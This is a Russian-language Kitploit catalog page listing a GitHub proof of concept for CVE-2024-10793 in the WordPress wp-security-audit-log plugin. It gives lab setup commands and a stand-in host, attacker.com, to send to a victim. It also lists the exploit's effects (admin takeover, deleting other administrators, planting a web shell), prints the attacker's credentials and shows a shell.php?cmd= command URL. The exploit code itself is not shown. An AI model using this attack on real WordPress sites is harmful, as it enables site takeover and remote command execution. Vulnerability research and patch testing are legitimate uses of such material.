Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-10793 — Доказательство концепции эксплуатации уязвимости CVE-2024-10793, нацеленной на плагин WordPress wp-security-audit-log. Демонстрирует захват учетной записи, создание привилегированного пользователя, загрузку оболочки и манипуляции администратором с помощью специально сформированных HTTP-запросов. | Kitploit
Инструменты/GitHubGitHub/mahajian/cve-2024-10793
Повышение привилегийАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийРазработка Полезной Нагрузки
GitHubmahajian/cve-2024-10793

CVE-2024-10793

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Доказательство концепции эксплуатации уязвимости CVE-2024-10793, нацеленной на плагин WordPress wp-security-audit-log. Демонстрирует захват учетной записи, создание привилегированного пользователя, загрузку оболочки и манипуляции администратором с помощью специально сформированных HTTP-запросов.

Поделиться
Репозиторий
2171 год назадЕщё не проверено

CVE-2024-10793 Доказательство концепции

Добавьте эти строки в ваш файл hosts:

127.0.0.1  goodcms.lab
127.0.0.1  attacker.com

Запустите WordPress с помощью Docker:

$ sudo systemctl start docker
$ sudo docker-compose up -d

Откройте http://goodcms.lab:2121 и выполните шаги установки WordPress. Установите wp-security-audit-log.5.2.1 или более старые версии в WordPress.

Запустите сервер атакующего:

$ php -S 0:9091 -t ./exploit

Передайте http://attacker.com жертве и Бинго!

Последствия эксплуатации:

  • Добавить привилегированного пользователя.
  • Изменить профиль текущего администратора
  • Удалить всех администраторов, кроме хакера :)
  • Загрузка шелла
  • Выход из системы

alt text

Захват учетной записи и создание привилегированного пользователя (PoC): Учетные данные атакующего после эксплуатации: { email: [email protected], username: amin, password: 123456 } (Вы можете изменить в коде xpl.js.)

Выполните команду оболочки: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

alt text

Скачать инструмент